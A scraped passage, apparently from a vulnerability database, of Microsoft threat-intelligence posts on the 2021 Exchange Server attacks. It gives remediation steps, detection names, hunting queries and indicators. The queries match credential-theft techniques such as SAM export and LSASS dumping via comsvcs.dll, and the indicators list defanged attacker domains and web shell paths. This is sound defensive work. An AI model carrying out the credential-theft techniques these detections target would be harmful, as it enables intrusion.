While the observed ransomware attempts were small-scale or had errors, there is still the possibility of [more skillful groups](<https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/>) utilizing credentials gained in these attacks for later attacks.\n\nAttackers also used their access to perform extensive reconnaissance using built-in Exchange commandlets and _dsquery_ to exfiltrate information about network configurations, user information, and email assets.\n\nWhile Lemon Duck operators might have had the boldest method for removing other attackers from the systems they compromised, they were not the only attacker to do so. Others were observed cleaning up .aspx and .bat files to remove other attackers, and even rebuilding the WMI database by deleting .mof files and restarting the service. As the window on unpatched machines closes, attackers showed increased interest in maintaining the access to the systems they exploited. By utilizing "malwareless" persistence mechanisms like enabling RDP, installing Shadow IT tools, and adding new local administrator accounts, the attackers are hoping to evade incident response efforts that might focus exclusively on web shells, AV scans, and patching.\n\n## Defending against exploits and post-compromise activities\n\nAttackers exploit the on-premises Exchange Server vulnerabilities in combination to bypass authentication and gain the ability to write files and run malicious code. The best and most complete remediation for these vulnerabilities is to update to a supported Cumulative Update and to install all security updates. Comprehensive mitigation guidance can be found here: <https://aka.ms/ExchangeVulns>.\n\nAs seen in the post-exploitation attacks discussed in this blog, the paths that attackers can take after successfully exploiting the vulnerabilities are varied and wide-ranging. 
If you have determined or have reason to suspect that these threats are present on your network, here are immediate steps you can take:\n\n * Investigate exposed Exchange servers for compromise, regardless of their current patch status.\n * Look for web shells via our [guidance](<https://aka.ms/exchange-customer-guidance>) and run a full AV scan using the [Exchange On-Premises Mitigation Tool](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>).\n * Investigate Local Users and Groups, even non-administrative users, for changes, and ensure all users require a password for sign-in. New user account creations (represented by Event ID 4720) during the time the system was vulnerable might indicate a malicious user creation.\n * Reset and randomize local administrator passwords with a tool like [LAPS](<https://aka.ms/laps>) if you are not already doing so.\n * Look for changes to the RDP, firewall, WMI subscriptions, and Windows Remote Management (WinRM) configuration of the system that might have been configured by the attacker to allow persistence.\n * Look for Event ID 1102 to determine if attackers cleared event logs, an activity that attackers perform with _exe_ in an attempt to hide their tracks.\n * Look for new persistence mechanisms such as unexpected services, scheduled tasks, and startup items.\n * Look for Shadow IT tools that attackers might have installed for persistence, such as non-Microsoft RDP and remote access clients.\n * Check mailbox-level email forwarding settings (both _ForwardingAddress_ and _ForwardingSMTPAddress_ attributes), check mailbox inbox rules (which might be used to forward email externally), and check Exchange Transport rules that you might not recognize.\n\nWhile our response tools check for and remove known web shells and attack tools, performing a full investigation of these systems is recommended. 
For comprehensive investigation and mitigation guidance and tools, see <https://aka.ms/exchange-customer-guidance>.\n\nAdditionally, here are best practices for building credential hygiene and practicing the principle of least privilege:\n\n * Follow guidance to run Exchange in least-privilege configuration: <https://adsecurity.org/?p=4119>.\n * Ensure service accounts and scheduled tasks run with the least privileges they need. Avoid widely privileged groups like domain admins and backup operators and prefer accounts with access to just the systems they need.\n * Randomize local administrator passwords to prevent lateral movement with tools like [LAPS](<https://aka.ms/laps>).\n * Ensure administrators practice good administration habits like [Privileged Admin Workstations](<https://docs.microsoft.com/en-us/security/compass/overview>).\n * Prevent privileged accounts like domain admins from signing into member servers and workstations using Group Policy to limit credential exposure and lateral movement.\n\n## Appendix\n\n### Microsoft Defender for Endpoint detection details\n\n**Antivirus**\n\nMicrosoft Defender Antivirus detects exploitation behavior with these detections:\n\n * Behavior:Win32/Exmann\n * [Behavior:Win32/IISExchgSpawnEMS](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/IISExchgSpawnEMS.A&threatId=-2147212928>)\n * [Exploit:ASP/CVE-2021-27065](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit:ASP/CVE-2021-27065>)\n * Exploit:Script/Exmann\n * Trojan:Win32/IISExchgSpawnCMD\n * [Behavior:Win32/IISExchgDropWebshell](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/IISExchgDropWebshell.B&threatId=-2147190469>)\n\nWeb shells are detected as:\n\n * [Backdoor:JS/Webshell](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:JS/WebShell&threatId=-2147233581>)\n * 
[Backdoor:PHP/Chopper](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:PHP/Chopper.B!dha&threatId=-2147231664>)\n * Backdoor:ASP/Chopper\n * Backdoor:MSIL/Chopper\n * [Trojan:JS/Chopper](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:JS/Chopper!dha&threatId=-2147232033>)\n * Trojan:Win32/Chopper\n * [Behavior:Win32/WebShellTerminal](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/WebShellTerminal.A&threatId=-2147213299>)\n\nRansomware payloads and associated files are detected as:\n\n * [Trojan:BAT/Wenam](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:BAT/Wenam.A&threatId=-2147188992>) - _xx.bat_ behaviors\n * [Ransom:Win32/DoejoCrypt](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/DoejoCrypt.A&threatId=-2147189904>) - DoejoCrypt ransomware\n * [Trojan:PowerShell/Redearps](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:PowerShell/Redearps.A&threatId=-2147189091>) - PowerShell spreader in Pydomer attacks\n * [Ransom:Win64/Pydomer](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win64/Pydomer.A&threatId=-2147189083>) - Pydomer ransomware\n\nLemon Duck malware is detected as:\n\n * [Trojan:PowerShell/LemonDuck](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:PowerShell/LemonDuck.A&threatId=-2147189579>)\n * [Trojan:Win32/LemonDuck](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/LemonDuck.A&threatId=-2147189576>)\n\nSome of the credential theft techniques highlighted in this report are detected as:\n\n * 
[Behavior:Win32/DumpLsass](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/DumpLsass.A!attk&threatId=-2147237471>)\n * Behavior:Win32/RegistryExfil\n\n**Endpoint detection and response (EDR)**\n\nAlerts with the following titles in the security center can indicate threat activity on your network:\n\n * Suspicious Exchange UM process creation\n * Suspicious Exchange UM file creation\n * Suspicious w3wp.exe activity in Exchange\n * Possible exploitation of Exchange Server vulnerabilities\n * Possible IIS web shell\n * Possible web shell installation\n * Web shells associated with Exchange Server vulnerabilities\n * Network traffic associated with Exchange Server exploitation\n\nAlerts with the following titles in the security center can indicate threat activity on your network specific to the DoejoCrypt and Pydomer ransomware campaign:\n\n * DoejoCrypt ransomware\n * Pydomer ransomware\n * Pydomer download site\n\nAlerts with the following titles in the security center can indicate threat activity on your network specific to the Lemon Duck botnet:\n\n * LemonDuck Malware\n * LemonDuck botnet C2 domain activity\n\nThe following behavioral alerts might also indicate threat activity associated with this threat:\n\n * Possible web shell installation\n * A suspicious web script was created\n * Suspicious processes indicative of a web shell\n * Suspicious file attribute change\n * Suspicious PowerShell command line\n * Possible IIS Web Shell\n * Process memory dump\n * A malicious PowerShell Cmdlet was invoked on the machine\n * WDigest configuration change\n * Sensitive information lookup\n * Suspicious registry export\n\n### Advanced hunting\n\nTo locate possible exploitation activities in Microsoft Defender for Endpoint, run the following queries.\n\n**Processes run by the IIS worker process**\n\nLook for processes executed by the IIS worker process\n\n`// Broadly search for processes executed by the IIS worker process. 
Further investigation should be performed on any devices where the created process is indicative of reconnaissance \nDeviceProcessEvents \n| where InitiatingProcessFileName == 'w3wp.exe' \n| where InitiatingProcessCommandLine contains \"MSExchange\" \n| where FileName !in~ (\"csc.exe\",\"cvtres.exe\",\"conhost.exe\",\"OleConverter.exe\",\"wermgr.exe\",\"WerFault.exe\",\"TranscodingService.exe\") \n| project FileName, ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\nSearch for PowerShell spawned from the IIS worker process, observed most frequently in Lemon Duck with Base64 encoding to obfuscate C2 domains\n\n`DeviceProcessEvents \n| where FileName =~ \"powershell.exe\" \n| where InitiatingProcessFileName =~ \"w3wp.exe\" \n| where InitiatingProcessCommandLine contains \"MSExchange\" \n| project ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Tampering**\n\nSearch for Lemon Duck tampering with Microsoft Defender Antivirus\n\n`DeviceProcessEvents \n| where InitiatingProcessCommandLine has_all (\"Set-MpPreference\", \"DisableRealtimeMonitoring\", \"Add-MpPreference\", \"ExclusionProcess\") \n| project ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Batch script actions**\n\nSearch for batch scripts performing credential theft, as observed in DoejoCrypt infections\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName == \"cmd.exe\" \n| where InitiatingProcessCommandLine has \".bat\" and InitiatingProcessCommandLine has @\"C:\\Windows\\Temp\" \n| where ProcessCommandLine has \"reg save\" \n| project ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\nLook for evidence of batch script execution that leads to credential dumping\n\n`// Search for batch script execution, leading to credential dumping using rundll32 and the COM Services DLL, dsquery, and makecab use \nDeviceProcessEvents \n| where InitiatingProcessFileName =~ \"cmd.exe\" \n| where 
InitiatingProcessCommandLine has \".bat\" and InitiatingProcessCommandLine has @\"\\inetpub\\wwwroot\\aspnet_client\\\" \n| where InitiatingProcessParentFileName has \"w3wp\" \n| where FileName != \"conhost.exe\" \n| project FileName, ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Suspicious files dropped under an aspnet_client folder**\n\nLook for dropped suspicious files like web shells and other components\n\n`// Search for suspicious files, including but not limited to batch scripts and web shells, dropped under the file path C:\\inetpub\\wwwroot\\aspnet_client\\ \nDeviceFileEvents \n| where InitiatingProcessFileName == \"w3wp.exe\" \n| where FolderPath has \"\\\\aspnet_client\\\\\" \n| where InitiatingProcessCommandLine contains \"MSExchange\" \n| project FileName, FolderPath, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Checking for persistence on systems suspected of being compromised**\n\nSearch for creation of new local accounts\n\n`DeviceProcessEvents \n| where FileName == \"net.exe\" \n| where ProcessCommandLine has_all (\"user\", \"add\") \n| project ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Search for installation events that were used to download ScreenConnect for persistence**\n\nNote that this query may be noisy and is not necessarily indicative of malicious activity alone.\n\n`DeviceProcessEvents \n| where FileName =~ \"msiexec.exe\" \n| where ProcessCommandLine has @\"C:\\Windows\\Temp\\\" \n| parse-where kind=regex flags=i ProcessCommandLine with @\"C:\\\\Windows\\\\Temp\\\\\" filename:string @\".msi\" \n| project filename, ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Hunting for credential theft**\n\nSearch for logon events related to services and scheduled tasks on devices that may be Exchange servers. 
The results of this query should be used to verify whether any of these users have privileged roles that might have enabled further persistence.\n\n`let devices = \nDeviceProcessEvents \n| where InitiatingProcessFileName == \"w3wp.exe\" and InitiatingProcessCommandLine contains \"MSExchange\" \n| distinct DeviceId; \n// \nDeviceLogonEvents \n| where DeviceId in (devices) \n| where LogonType in (\"Batch\", \"Service\") \n| project AccountName, AccountDomain, LogonType, DeviceId, Timestamp`\n\nSearch for WDigest registry key modification, which allows the LSASS process to store plaintext passwords.\n\n`DeviceRegistryEvents \n| where RegistryValueName == \"UseLogonCredential\" \n| where RegistryKey has \"WDigest\" and RegistryValueData == \"1\" \n| project PreviousRegistryValueData, RegistryValueData, RegistryKey, RegistryValueName, InitiatingProcessFileName, InitiatingProcessCommandLine, InitiatingProcessParentFileName, DeviceId, Timestamp`\n\nSearch for the COM services DLL being executed by rundll32, which can be used to dump LSASS memory.\n\n`DeviceProcessEvents \n| where InitiatingProcessCommandLine has_all (\"rundll32.exe\", \"comsvcs.dll\") \n| project FileName, ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessCommandLine, InitiatingProcessParentFileName, DeviceId, Timestamp`\n\nSearch for Security Account Manager (SAM) or SECURITY databases being saved, from which credentials can later be extracted.\n\n`DeviceProcessEvents \n| where FileName == \"reg.exe\" \n| where ProcessCommandLine has \"save\" and ProcessCommandLine has_any (\"hklm\\\\security\", \"hklm\\\\sam\") \n| project InitiatingProcessFileName, InitiatingProcessCommandLine, FileName, ProcessCommandLine, InitiatingProcessParentFileName, DeviceId, Timestamp`\n\n## Indicators\n\nSelected indicators from attacks are included here; the threats may use files and network indicators not represented here.\n\n**Files (SHA-256)**\n\nThe following are file hashes for some of the web 
shells observed during attacks:\n\nDoejoCrypt associated hashes:\n\nLemon Duck associated hashes:\n\nPydomer associated hashes:\n\n**Network indicators**\n\nDomains abused by Lemon Duck:\n\n * down[.]sqlnetcat[.]com\n * t[.]sqlnetcat[.]com\n * t[.]netcatkit[.]com\n\nPydomer DGA network indicators:\n\n * uiiuui[.]com/search/*\n * yuuuuu43[.]com/vpn-service/*\n * yuuuuu44[.]com/vpn-service/*\n * yuuuuu46[.]com/search/*\n\nThe post [Analyzing attacks taking advantage of the Exchange Server vulnerabilities](<https://www.microsoft.com/security/blog/2021/03/25/analyzing-attacks-taking-advantage-of-the-exchange-server-vulnerabilities/>) appeared first on Microsoft Security.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": 
"2021-03-25T21:21:07", "type": "mmpc", "title": "Analyzing attacks taking advantage of the Exchange Server vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-27065"], "modified": "2021-03-25T21:21:07", "id": "MMPC:2FB5327A309898BD59A467446C9C36DC", "href": "https://www.microsoft.com/security/blog/2021/03/25/analyzing-attacks-taking-advantage-of-the-exchange-server-vulnerabilities/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-10T12:28:51", "description": "_**Update [03/08/2021]**: Microsoft continues to see multiple actors taking advantage of unpatched systems to attack organizations with on-premises Exchange Server. To aid defenders in investigating these attacks where Microsoft security products and tooling may not be deployed, we are releasing a feed of observed indicators of compromise (IOCs). The feed of malware hashes and known malicious file paths observed in related attacks is available in both JSON and CSV formats at the below GitHub links. 
This information is being shared as TLP:WHITE._\n\n * [CSV format](<https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/MSTICIoCs-ExchangeServerVulnerabilitiesDisclosedMarch2021.csv>)\n * [JSON format](<https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/MSTICIoCs-ExchangeServerVulnerabilitiesDisclosedMarch2021.json>)\n\n_**Update [03/05/2021]**: Microsoft sees increased use of these vulnerabilities in attacks targeting unpatched systems by multiple malicious actors beyond HAFNIUM. To aid customers in investigating these attacks, __Microsoft Security Response Center (MSRC) has provided additional resources, including new mitigation guidance: [Microsoft Exchange Server Vulnerabilities Mitigations \u2013 March 2021](<https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/>)_\n\n_**Update [03/04/2021]**: The Exchange Server team released a script for checking HAFNIUM indicators of compromise (IOCs). See Scan Exchange log files for indicators of compromise._\n\n \n\nMicrosoft has detected multiple 0-day exploits being used to attack on-premises versions of Microsoft Exchange Server in limited and targeted attacks. In the attacks observed, the threat actor used these vulnerabilities to access on-premises Exchange servers which enabled access to email accounts, and allowed installation of additional malware to facilitate long-term access to victim environments. 
Microsoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence to [HAFNIUM](<https://blogs.microsoft.com/on-the-issues/?p=64505>), a group assessed to be state-sponsored and operating out of China, based on observed victimology, tactics and procedures.\n\nThe vulnerabilities recently being exploited were CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065, all of which were addressed in today\u2019s [Microsoft Security Response Center (MSRC) release - Multiple Security Updates Released for Exchange Server](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server>). We strongly urge customers to update on-premises systems immediately. Exchange Online is not affected.\n\nWe are sharing this information with our customers and the security community to emphasize the critical nature of these vulnerabilities and the importance of patching all affected systems immediately to protect against these exploits and prevent future abuse across the ecosystem. This blog also continues our mission to shine a light on malicious actors and elevate awareness of the sophisticated tactics and techniques used to target our customers. The related IOCs, [Azure Sentinel](<https://azure.microsoft.com/en-us/services/azure-sentinel/>) advanced hunting queries, and [Microsoft Defender for Endpoint](<https://www.microsoft.com/en-us/microsoft-365/security/endpoint-defender>) product detections and queries shared in this blog will help SOCs proactively hunt for related activity in their environments and elevate any alerts for remediation.\n\nMicrosoft would like to thank our industry colleagues at Volexity and Dubex for reporting different parts of the attack chain and their collaboration in the investigation. Volexity has also [published a blog post](<https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities>) with their analysis. 
It is this level of proactive communication and intelligence sharing that allows the community to come together to get ahead of attacks before they spread and improve security for all.\n\n## Who is HAFNIUM?\n\nHAFNIUM primarily targets entities in the United States across a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs.\n\nHAFNIUM has previously compromised victims by exploiting vulnerabilities in internet-facing servers, and has used legitimate open-source frameworks, like [Covenant](<https://github.com/cobbr/Covenant>), for command and control. Once they\u2019ve gained access to a victim network, HAFNIUM typically exfiltrates data to file sharing sites like [MEGA](<https://mega.nz/>).\n\nIn campaigns unrelated to these vulnerabilities, Microsoft has observed HAFNIUM interacting with victim Office 365 tenants. While they are often unsuccessful in compromising customer accounts, this reconnaissance activity helps the adversary identify more details about their targets\u2019 environments.\n\nHAFNIUM operates primarily from leased virtual private servers (VPS) in the United States.\n\n## Technical details\n\nMicrosoft is providing the following details to help our customers understand the techniques used by HAFNIUM to exploit these vulnerabilities and enable more effective defense against any future attacks against unpatched systems.\n\n[CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>) is a server-side request forgery (SSRF) vulnerability in Exchange which allowed the attacker to send arbitrary HTTP requests and authenticate as the Exchange server.\n\n[CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>) is an insecure deserialization vulnerability in the Unified Messaging service. Insecure deserialization is where untrusted user-controllable data is deserialized by a program. 
Exploiting this vulnerability gave HAFNIUM the ability to run code as SYSTEM on the Exchange server. This requires administrator permission or another vulnerability to exploit.\n\n[CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>) is a post-authentication arbitrary file write vulnerability in Exchange. If HAFNIUM could authenticate with the Exchange server then they could use this vulnerability to write a file to any path on the server. They could authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate admin\u2019s credentials.\n\n[CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>) is a post-authentication arbitrary file write vulnerability in Exchange. If HAFNIUM could authenticate with the Exchange server then they could use this vulnerability to write a file to any path on the server. They could authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate admin\u2019s credentials.\n\n## Attack details\n\nAfter exploiting these vulnerabilities to gain initial access, HAFNIUM operators deployed web shells on the compromised server. Web shells potentially allow attackers to steal data and perform additional malicious actions that lead to further compromise. 
One example of a web shell deployed by HAFNIUM, written in ASP, is below:\n\n\n\nFollowing web shell deployment, HAFNIUM operators performed the following post-exploitation activity:\n\n * Using Procdump to dump the LSASS process memory:\n\n\n\n * Using 7-Zip to compress stolen data into ZIP files for exfiltration:\n\n\n\n * Adding and using Exchange PowerShell snap-ins to export mailbox data:\n\n\n\n * Using the [Nishang](<https://github.com/samratashok/nishang>) Invoke-PowerShellTcpOneLine reverse shell:\n\n\n\n * Downloading PowerCat from GitHub, then using it to open a connection to a remote server:\n\n\n\nHAFNIUM operators were also able to download the Exchange offline address book from compromised systems, which contains information about an organization and its users.\n\nOur blog, [Defending Exchange servers under attack](<https://www.microsoft.com/security/blog/2020/06/24/defending-exchange-servers-under-attack/>), offers advice for improving defenses against Exchange server compromise. Customers can also find additional guidance about web shell attacks in our blog [Web shell attacks continue to rise.](<https://www.microsoft.com/security/blog/2021/02/11/web-shell-attacks-continue-to-rise/>)\n\n## Can I determine if I have been compromised by this activity?\n\nThe below sections provide indicators of compromise (IOCs), detection guidance, and advanced hunting queries to help customers investigate this activity using Exchange server logs, Azure Sentinel, Microsoft Defender for Endpoint, and Microsoft 365 Defender. 
We encourage our customers to conduct investigations and implement proactive detections to identify possible prior campaigns and prevent future campaigns that may target their systems.\n\n### Check patch levels of Exchange Server\n\nThe Microsoft Exchange Server team has published a [blog post on these new Security Updates](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-march-2021-exchange-server-security-updates/ba-p/2175901>) providing a script to get a quick inventory of the patch-level status of on-premises Exchange servers and answer some basic questions around installation of these patches.\n\n### Scan Exchange log files for indicators of compromise\n\nThe Exchange Server team has created a script to run a check for HAFNIUM IOCs to address performance and memory concerns. That script is available here: <https://github.com/microsoft/CSS-Exchange/tree/main/Security>.\n\n * CVE-2021-26855 exploitation can be detected via the following Exchange HttpProxy logs: \n * These logs are located in the following directory: %PROGRAMFILES%\\Microsoft\\Exchange Server\\V15\\Logging\\HttpProxy\n * Exploitation can be identified by searching for log entries where the AuthenticatedUser is empty and the AnchorMailbox contains the pattern of ServerInfo~*/* \n * Here is an example PowerShell command to find these log entries:\n\n`Import-Csv -Path (Get-ChildItem -Recurse -Path \"$env:PROGRAMFILES\\Microsoft\\Exchange Server\\V15\\Logging\\HttpProxy\" -Filter '*.log').FullName | Where-Object { $_.AnchorMailbox -like 'ServerInfo~*/*' -or $_.BackEndCookie -like 'Server~*/*~*'} | select DateTime, AnchorMailbox, UrlStem, RoutingHint, ErrorCode, TargetServerVersion, BackEndCookie, GenericInfo, GenericErrors, UrlHost, Protocol, Method, RoutingType, AuthenticationType, ServerHostName, HttpStatus, BackEndStatus, UserAgent`\n\n * If activity is detected, the logs specific to the application specified in the AnchorMailbox path can be used to help determine what actions were taken. \n * These logs are located in the %PROGRAMFILES%\\Microsoft\\Exchange Server\\V15\\Logging directory.\n * CVE-2021-26858 exploitation can be detected via the Exchange log files: \n * C:\\Program Files\\Microsoft\\Exchange Server\\V15\\Logging\\OABGeneratorLog\n * Files should only be downloaded to the %PROGRAMFILES%\\Microsoft\\Exchange Server\\V15\\ClientAccess\\OAB\\Temp directory \n * In case of exploitation, files are downloaded to other directories (UNC or local paths)\n * Windows command to search for potential exploitation:\n\n`findstr /snip /c:\"Download failed and temporary file\" \"%PROGRAMFILES%\\Microsoft\\Exchange Server\\V15\\Logging\\OABGeneratorLog\\*.log\"`\n\n * CVE-2021-26857 exploitation can be detected via the Windows Application event logs \n * Exploitation of this deserialization bug will create Application events with the following properties: \n * Source: MSExchange Unified Messaging\n * EntryType: Error\n * Event Message Contains: System.InvalidCastException\n * Following is a PowerShell command to query the Application Event Log for these log entries:\n\n`Get-EventLog -LogName Application -Source \"MSExchange Unified Messaging\" -EntryType Error | Where-Object { $_.Message -like \"*System.InvalidCastException*\" }`\n\n * CVE-2021-27065 exploitation can be detected via the following Exchange log files: \n * C:\\Program Files\\Microsoft\\Exchange Server\\V15\\Logging\\ECP\\Server\n\nAll Set-<AppName>VirtualDirectory properties should never contain script. InternalUrl and ExternalUrl should only be valid Uris.\n\n * Following is a PowerShell command to search for _potential_ exploitation:\n\n`Select-String -Path \"$env:PROGRAMFILES\\Microsoft\\Exchange Server\\V15\\Logging\\ECP\\Server\\*.log\" -Pattern 'Set-.+VirtualDirectory'`\n\n## Host IOCs\n\nMicrosoft is releasing a feed of observed indicators of compromise (IOCs) in related attacks. 
This feed is available in both [CSV](<https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/MSTICIoCs-ExchangeServerVulnerabilitiesDisclosedMarch2021.csv>) and [JSON](<https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/MSTICIoCs-ExchangeServerVulnerabilitiesDisclosedMarch2021.json>) formats. This information is being shared as TLP:WHITE.\n\n### Hashes\n\nWeb shell hashes\n\n### Paths\n\nWe observed web shells in the following paths:\n\n * _C:\\inetpub\\wwwroot\\aspnet_client\\_\n * _C:\\inetpub\\wwwroot\\aspnet_client\\system_web\\_\n * _In Microsoft Exchange Server installation paths such as:_\n * _%PROGRAMFILES%\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\_\n * _C:\\Exchange\\FrontEnd\\HttpProxy\\owa\\auth\\_\n\nThe web shells we detected had the following file names:\n\n * _web.aspx_\n * _help.aspx_\n * _document.aspx_\n * _errorEE.aspx_\n * _errorEEE.aspx_\n * _errorEW.aspx_\n * _errorFF.aspx_\n * _healthcheck.aspx_\n * _aspnet_www.aspx_\n * _aspnet_client.aspx_\n * _xx.aspx_\n * _shell.aspx_\n * _aspnet_iisstart.aspx_\n * _one.aspx_\n\nCheck for suspicious .zip, .rar, and .7z files in _C:\\ProgramData\\_, which may indicate possible data exfiltration.\n\nCustomers should monitor these paths for LSASS dumps:\n\n * _C:\\windows\\temp\\_\n * _C:\\root\\_\n\n### Tools\n\n * 
[Procdump](<https://docs.microsoft.com/en-us/sysinternals/downloads/procdump>)\n * [Nishang](<https://github.com/samratashok/nishang>)\n * [PowerCat](<https://github.com/besimorhino/powercat>)\n\nMany of the following detections are for post-breach techniques used by HAFNIUM. So while these help detect some of the specific current attacks that Microsoft has observed it remains very important to apply the recently released updates for CVE-2021-26855, CVE-2021-26857, CVE-2021-27065 and CVE-2021-26858.\n\n## Microsoft Defender Antivirus detections\n\nPlease note that some of these detections are generic detections and not unique to this campaign or these exploits.\n\n * Exploit:Script/Exmann.A!dha\n * Behavior:Win32/Exmann.A\n * Backdoor:ASP/SecChecker.A\n * Backdoor:JS/Webshell _(not unique)_\n * Trojan:JS/Chopper!dha _(not unique)_\n * Behavior:Win32/DumpLsass.A!attk _(not unique)_\n * Backdoor:HTML/TwoFaceVar.B _(not unique)_\n\n## Microsoft Defender for Endpoint detections\n\n * Suspicious Exchange UM process creation\n * Suspicious Exchange UM file creation\n * Possible web shell installation _(not unique)_\n * Process memory dump _(not unique)_\n\n## Azure Sentinel detections\n\n * [HAFNIUM Suspicious Exchange Request](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/W3CIISLog/HAFNIUMSuspiciousExchangeRequestPattern.yaml>)\n * [HAFNIUM UM Service writing suspicious file](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/HAFNIUMUmServiceSuspiciousFile.yaml>)\n * [HAFNIUM New UM Service Child Process](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityEvent/HAFNIUMNewUMServiceChildProcess.yaml>)\n * [HAFNIUM Suspicious UM Service Errors](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityEvent/HAFNIUMSuspiciousIMServiceError.yaml>)\n * [HAFNIUM Suspicious File 
Downloads](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/htttp_proxy_oab_CL/HAFNIUMSuspiciousFileDownloads.yaml>)\n\n## Advanced hunting queries\n\nTo locate possible exploitation activity related to the contents of this blog, you can run the following [advanced hunting](<https://securitycenter.windows.com/hunting>) queries via Microsoft Defender for Endpoint and Azure Sentinel:\n\n### Microsoft Defender for Endpoint advanced hunting queries\n\nMicrosoft 365 Defender customers can find related hunting queries below or at this GitHub location: [https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/ ](<https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/>)\n\nAdditional queries and information are available via [_Threat Analytics portal_](<https://securitycenter.windows.com/threatanalytics3/>) for Microsoft Defender customers.\n\n**UMWorkerProcess.exe in Exchange creating abnormal content**\n\nLook for Microsoft Exchange Server\u2019s Unified Messaging service creating non-standard content on disk, which could indicate web shells or other malicious content, suggesting exploitation of CVE-2021-26858 vulnerability:\n\n`DeviceFileEvents | where InitiatingProcessFileName == \"UMWorkerProcess.exe\" | where FileName != \"CacheCleanup.bin\" | where FileName !endswith \".txt\" | where FileName !endswith \".LOG\" | where FileName !endswith \".cfg\" | where FileName != \"cleanup.bin\"`\n\n**UMWorkerProcess.exe spawning**\n\nLook for Microsoft Exchange Server\u2019s Unified Messaging service spawning abnormal subprocesses, suggesting exploitation of CVE-2021-26857 vulnerability:\n\n`DeviceProcessEvents | where InitiatingProcessFileName == \"UMWorkerProcess.exe\" | where FileName != \"wermgr.exe\" | where FileName != \"WerFault.exe\"`\n\nPlease 